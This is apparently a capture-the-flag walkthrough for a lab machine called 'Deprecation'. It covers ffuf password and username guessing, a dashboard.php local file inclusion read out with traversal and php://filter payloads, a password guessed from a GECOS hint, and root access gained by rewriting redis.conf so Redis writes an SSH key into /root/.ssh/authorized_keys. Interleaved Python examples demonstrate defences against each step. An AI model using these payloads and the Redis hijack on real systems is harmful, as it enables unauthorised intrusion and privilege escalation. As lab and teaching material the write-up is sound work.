mazesec Deprecation

Enumeration

The initial scan showed that the target exposes only the usual web port.

# -x must be used to specify file extensions; otherwise Gobuster only looks for directories
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak

Key endpoints found:

  • /index.php (login page)
  • /reg.php (registration page; its password anti-reuse check leaks whether a password is already in use, which allows password enumeration)
  • /config.php (backend configuration)
  • /dashboard.php (control panel after login)

FFUF

Guessing passwords with ffuf

Copy the raw HTTP request captured in Burp as-is and save it on the Kali machine as req.txt.

ffuf -request req.txt -request-proto http -w /usr/share/wordlists/rockyou.txt -fs "[]"

Two passwords come out: guest123 and 123123.

In the same way, use ffuf against index.php to test usernames:

ffuf -request login.txt -request-proto http -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -mc "301"

Result:

  • guest:guest123
  • test:123123

Web

The login form has a simple anti-brute-force mechanism (a per-session limit on the number of attempts), but the directory scan turned up the backend page dashboard.php.
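A per-session attempt counter is easy to sidestep because the client controls the session cookie. The following added example (my own illustration, not code from the box or from the write-up) shows the alternative a defender would want: a sliding-window limiter keyed on the target account and on the client IP, with two simulations that replay a fuzzer-style run where every request arrives as a fresh session. The class name, the limits and the sample IP 192.0.2.10 are assumptions.

```python
import time
from collections import defaultdict, deque


class LoginLimiter:
    """Sliding-window failed-login limiter keyed on the target account and on
    the client IP (hypothetical design, not the box's own code). A counter kept
    in the session is reset by simply dropping the cookie, which is why a
    per-session limit does not stop a wordlist run; keys the client does not
    control do."""

    def __init__(self, max_attempts=5, window_seconds=300, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.clock = clock
        self._failures = defaultdict(deque)  # key -> timestamps of failed attempts

    @staticmethod
    def _keys(username, client_ip):
        return ("user", username.strip().lower()), ("ip", client_ip)

    def _live(self, key, now):
        # Drop failures that have aged out of the window and return the rest.
        q = self._failures[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        return q

    def allowed(self, username, client_ip):
        now = self.clock()
        return all(len(self._live(k, now)) < self.max_attempts
                   for k in self._keys(username, client_ip))

    def record_failure(self, username, client_ip):
        now = self.clock()
        for k in self._keys(username, client_ip):
            self._live(k, now).append(now)

    def record_success(self, username, client_ip):
        # A real login clears the account counter; the IP counter keeps its history.
        self._failures.pop(self._keys(username, client_ip)[0], None)


def simulate_wordlist_run(passwords, correct, username="guest", client_ip="192.0.2.10",
                          max_attempts=5):
    """Replay a constructed password list the way a fuzzer would: every request
    is a fresh session. Returns (attempts_evaluated, found_correct)."""
    fake_now = [1000.0]
    limiter = LoginLimiter(max_attempts=max_attempts, clock=lambda: fake_now[0])
    evaluated = 0
    for candidate in passwords:
        fake_now[0] += 0.2  # requests arrive 200 ms apart
        if not limiter.allowed(username, client_ip):
            continue  # throttled: the candidate is never checked
        evaluated += 1
        if candidate == correct:
            limiter.record_success(username, client_ip)
            return evaluated, True
        limiter.record_failure(username, client_ip)
    return evaluated, False


def simulate_user_rotation(usernames, client_ip="192.0.2.10", max_attempts=5):
    """One source IP spraying a password across many accounts: the per-account
    key never trips, but the per-IP key does. Returns attempts evaluated."""
    fake_now = [2000.0]
    limiter = LoginLimiter(max_attempts=max_attempts, clock=lambda: fake_now[0])
    evaluated = 0
    for user in usernames:
        fake_now[0] += 0.2
        if limiter.allowed(user, client_ip):
            evaluated += 1
            limiter.record_failure(user, client_ip)
    return evaluated


if __name__ == "__main__":
    wordlist = ["123456", "password", "qwerty", "letmein", "guest", "guest123", "abc123"]
    print(simulate_wordlist_run(wordlist, correct="guest123"))   # (5, False)
    print(simulate_user_rotation(["admin", "guest", "test", "root", "www", "bob", "alice"]))  # 5
```

The two keys cover the two shapes of the attack on this box: a wordlist against one account (the account key trips after five failures even though every request is a new session) and one password across many usernames (the IP key trips instead). A real deployment would persist the counters in a shared store rather than a process-local dict.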

Code Audit

Testing dashboard.php showed that it is vulnerable to Local File Inclusion (LFI).

# Read /etc/passwd to find high-value targets
http://192.168.0.104/dashboard.php?view=../../../../../etc/passwd

Because requesting a PHP file directly comes back blank (the file is parsed instead of shown), the php://filter stream wrapper was used to pull out the core backend source code.

# Read the core business-logic source
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=config.php" | base64 -d

The source yields two important findings:

  • Redis credential leak: index.php hardcodes the password of the local Redis instance: mypassword123.
  • Underlying function limitation: dashboard.php reads files with file_get_contents() rather than include(). That means the target cannot be made to execute code, so the traditional log poisoning technique does not apply.
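The root cause on the backend is a file name taken straight from ?view= and handed to file_get_contents(). As an added example (not the box's PHP, and written in Python so it runs stand-alone), the resolver below shows the checks a hardened dashboard.php would need: it rejects stream wrappers such as php://filter, absolute paths, traversal that escapes the view directory after realpath(), and source files like index.php or config.php that must never be disclosed. The directory layout, the ALLOWED_SUFFIXES policy and the function names are assumptions.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Assumed policy: the dashboard may only render static view files from one directory.
ALLOWED_SUFFIXES = (".html", ".txt")


def resolve_view(base_dir, view):
    """Map an untrusted ?view= value to a file under base_dir, or raise ValueError.

    Each check corresponds to one thing file_get_contents($_GET['view']) would
    otherwise accept: stream wrappers (php://filter, data:, http://), absolute
    paths, '..' traversal (checked after realpath, so symlinks count too), and
    source files such as index.php / config.php that must never be disclosed.
    """
    if not view or "\x00" in view:
        raise ValueError("empty or NUL-containing view name")
    if urlsplit(view).scheme:
        raise ValueError("stream wrappers are not allowed")
    if os.path.isabs(view):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, view))
    if os.path.commonpath([base, target]) != base or target == base:
        raise ValueError("view escapes the view directory")
    if not target.endswith(ALLOWED_SUFFIXES):
        raise ValueError("only static view files may be served")
    if not os.path.isfile(target):
        raise ValueError("no such view")
    return target


def demo():
    """Build a constructed web root in a temp dir and replay the requests from
    the write-up plus a few variants. Returns {view: True if served else False}."""
    requests = [
        "about.html",                                    # legitimate
        "../../../../../etc/passwd",                     # traversal from the write-up
        "php://filter/read=convert.base64-encode/resource=index.php",
        "index.php",                                     # in-directory source disclosure
        "data:text/plain,hello",
        "/etc/passwd",
        "sub/../about.html",                             # normalises back inside base
    ]
    with tempfile.TemporaryDirectory() as root:
        views = os.path.join(root, "views")
        os.makedirs(os.path.join(views, "sub"))
        for name, body in (("about.html", "<h1>About</h1>"), ("index.php", "<?php ... ?>")):
            with open(os.path.join(views, name), "w") as fh:
                fh.write(body)
        results = {}
        for view in requests:
            try:
                resolve_view(views, view)
                results[view] = True
            except ValueError:
                results[view] = False
        return results


if __name__ == "__main__":
    for view, served in demo().items():
        print(f"{'served  ' if served else 'rejected'} {view}")
```

The scheme check is what closes the php://filter trick: a value that parses with a URL scheme is never treated as a path. The realpath-then-commonpath comparison is the general traversal defence; the suffix allowlist is what stops in-directory reads of index.php and config.php, which no amount of path normalisation would catch on its own.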

Exploitation (password derivation from social clues)

Stepping away from the deserialization rabbit hole and re-reading the /etc/passwd file obtained through the LFI, the comment field (GECOS) carries a very obvious hint:

shanran:x:1000:1000:shan******:/home/shanran:/bin/sh

Combine that with the pattern the developer used for the test accounts in the config.php source:

  • account test -> password 123123
  • account guest -> password guest123

Derivation: shanran (7 characters) + 123 (3 characters) = 10 characters, which matches the shan****** mask exactly.
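The credential that falls out of this derivation is a password policy failure: the login name plus a short numeric suffix, with the GECOS field advertising it. The added example below (constructed, not from the page) is a policy check that flags exactly that pattern, treating the login name and every word of the GECOS field as identity tokens that must not appear in the password. The blocklist, the minimum length and the sample accounts are assumptions; only the shanran passwd line comes from the write-up.

```python
import re

# Constructed sample blocklist; a real deployment would use a breach-derived list.
BLOCKLIST = {"123123", "123456", "password", "qwerty", "letmein"}
MIN_LENGTH = 12


def identity_tokens(username, gecos=""):
    """Words an attacker can read straight out of /etc/passwd: the login name
    and every word of the GECOS field, lower-cased, three characters or longer,
    longest first so the reported match is the most specific one."""
    words = [username] + re.split(r"[^A-Za-z0-9]+", gecos)
    return sorted({w.lower() for w in words if len(w) >= 3}, key=len, reverse=True)


def weak_password_reason(username, password, gecos=""):
    """Return None if the password is acceptable, otherwise a short reason.
    The identity-token rule is the one that would have caught shanran123."""
    pw = password.lower()
    if pw in BLOCKLIST:
        return "on the blocklist"
    for token in identity_tokens(username, gecos):
        if token in pw:
            return f"contains identity token '{token}'"
    if pw.isdigit():
        return "digits only"
    if len(password) < MIN_LENGTH:
        return f"shorter than {MIN_LENGTH} characters"
    return None


def audit_accounts(accounts):
    """accounts: iterable of (username, gecos, password). Returns {username: reason}
    for every account that fails, so a clean audit returns an empty dict."""
    failures = {}
    for username, gecos, password in accounts:
        reason = weak_password_reason(username, password, gecos)
        if reason:
            failures[username] = reason
    return failures


# Constructed sample data mirroring the pattern from the write-up (the shanran
# login name and GECOS value are the only items taken from the page).
SAMPLE_ACCOUNTS = [
    ("test", "", "123123"),
    ("guest", "", "guest123"),
    ("shanran", "shan******", "shanran123"),
    ("jdoe", "John Doe,,,", "Doe2024!secure"),
    ("ops", "Operations", "correct-horse-battery-staple"),
]

if __name__ == "__main__":
    for user, reason in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{user}: {reason}")
```

Running the audit reports test, guest, shanran and jdoe and passes ops: the first three fail for the reasons the write-up exploits, and jdoe shows why the GECOS words count as identity tokens even when the login name itself is absent from the password.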

USER

Log in over SSH directly with the derived password.

# Obtain the initial foothold (initial access)
ssh shanran@192.168.0.104
# Password: shanran123

ROOT

Collecting information about the system's privileges reveals a classic privilege escalation through a service misconfiguration.

shanran@Deprecation:~$ sudo -l
User shanran may run the following commands on Deprecation:
    (ALL) NOPASSWD: /sbin/rc-service redis restart
    (ALL) NOPASSWD: /sbin/rc-service redis stop
    (ALL) NOPASSWD: /sbin/rc-service redis start

Check how the Redis service runs and what permissions it has:

# 1. Redis is running as root, which it should not be
ps aux | grep '[r]edis'
#    root 2396 ... /usr/bin/redis-server
# 2. The redis group has write permission on the main configuration file
ls -l /etc/redis.conf
#    -rw-rw-r-- 1 root redis 325 /etc/redis.conf
# 3. Confirm that the current user shanran is a member of the redis group
id
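Each of the three observations above is a finding a configuration audit should raise before anyone strings them together. The added example below (my own, not from the page) audits a redis.conf text together with the file mode, the uid the server runs as and the sudo rules, and reports the conditions that make the escalation possible. The data-directory policy (/var/lib/redis), the sample configurations and the uid values are assumptions, and the server uid is passed in as a parameter rather than read from a running process.

```python
import os
import stat
import tempfile

# Assumed site policy: RDB dumps live under the Redis data directory.
DATA_DIR_PREFIXES = ("/var/lib/redis",)
GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH


def parse_redis_conf(text):
    """Minimal redis.conf parser: 'key value' lines, '#' comments, last value wins."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf[key.lower()] = value.strip().strip('"')
    return conf


def audit_redis(conf_text, conf_mode, server_uid, sudo_rules=()):
    """Return a list of findings for the conditions the escalation chains together:
    a dump directory outside the data dir, a dump file that is not an .rdb, a
    server running as root, a writable config, and a passwordless restart rule
    available to whoever can edit that config."""
    findings = []
    conf = parse_redis_conf(conf_text)

    dump_dir = conf.get("dir", "./")
    if not dump_dir.startswith(DATA_DIR_PREFIXES):
        findings.append(f"dir '{dump_dir}' is outside the Redis data directory")
    dump_file = conf.get("dbfilename", "dump.rdb")
    if not dump_file.endswith(".rdb"):
        findings.append(f"dbfilename '{dump_file}' is not an .rdb dump")
    if server_uid == 0:
        findings.append("redis-server runs as root; a dump can land in any directory")
    writable = bool(conf_mode & GROUP_OR_WORLD_WRITE)
    if writable:
        findings.append("redis.conf is group- or world-writable: %o" % (conf_mode & 0o777))
    restart_rules = [r.strip() for r in sudo_rules if "NOPASSWD" in r and "redis" in r]
    if restart_rules and writable:
        findings.append("sudo lets a config editor restart the service as root: "
                        + "; ".join(restart_rules))
    return findings


def audit_redis_conf_file(path, server_uid, sudo_rules=()):
    """Same audit against a real file: the mode comes from stat()."""
    st = os.stat(path)
    with open(path) as fh:
        text = fh.read()
    return audit_redis(text, stat.S_IMODE(st.st_mode), server_uid, sudo_rules)


# Constructed sample configurations: the first mirrors what the write-up writes
# into /etc/redis.conf, the second is a hardened baseline (assumed values).
HIJACKED_CONF = """dir /root/.ssh
dbfilename authorized_keys
port 6379
requirepass mypassword123
bind 127.0.0.1
"""
HARDENED_CONF = """# managed by configuration management
dir /var/lib/redis
dbfilename dump.rdb
port 6379
bind 127.0.0.1
requirepass REPLACE_WITH_A_REAL_SECRET
"""
SUDO_RULES = [
    "(ALL) NOPASSWD: /sbin/rc-service redis restart",
    "(ALL) NOPASSWD: /sbin/rc-service redis stop",
    "(ALL) NOPASSWD: /sbin/rc-service redis start",
]


def demo():
    """Write both sample configs to a temp dir with the mode seen on the box
    (0664) and a sane mode (0640); return {name: findings}."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        for name, text, mode, uid in (("hijacked", HIJACKED_CONF, 0o664, 0),
                                      ("hardened", HARDENED_CONF, 0o640, 1001)):
            path = os.path.join(d, f"{name}.conf")
            with open(path, "w") as fh:
                fh.write(text)
            os.chmod(path, mode)
            results[name] = audit_redis_conf_file(path, uid, SUDO_RULES)
    return results


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "clean")
```

The hardened baseline produces no findings even though the same sudo rules are present: the restart rule is only dangerous when combined with a config the user can write, which is why the audit reports it conditionally rather than on its own.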

Exploitation (arbitrary file write through Redis)

Using the write access to /etc/redis.conf, force Redis's persistence directory to the root user's SSH trust directory and have Redis write our SSH public key into it.

# 1. Rewrite the Redis configuration file to take over the persistence path
echo 'dir /root/.ssh' > /etc/redis.conf
echo 'dbfilename authorized_keys' >> /etc/redis.conf
echo 'port 6379' >> /etc/redis.conf
echo 'requirepass mypassword123' >> /etc/redis.conf
echo 'bind 127.0.0.1' >> /etc/redis.conf

# 2. Restart Redis as root so the malicious configuration takes effect
sudo /sbin/rc-service redis restart

# 3. Log in to Redis and inject the Kali attack machine's SSH public key
redis-cli -a mypassword123
127.0.0.1:6379> flushall
# Surround the key with newlines (redis-cli expands \n inside double quotes) so the RDB binary framing does not break parsing of the key line
127.0.0.1:6379> set crackit "\n\nssh-rsa AAAAB3Nza...[your public key]... kali@kali\n\n"
127.0.0.1:6379> save
127.0.0.1:6379> exit

# 4. SSH straight to root without a password
ssh root@192.168.0.104
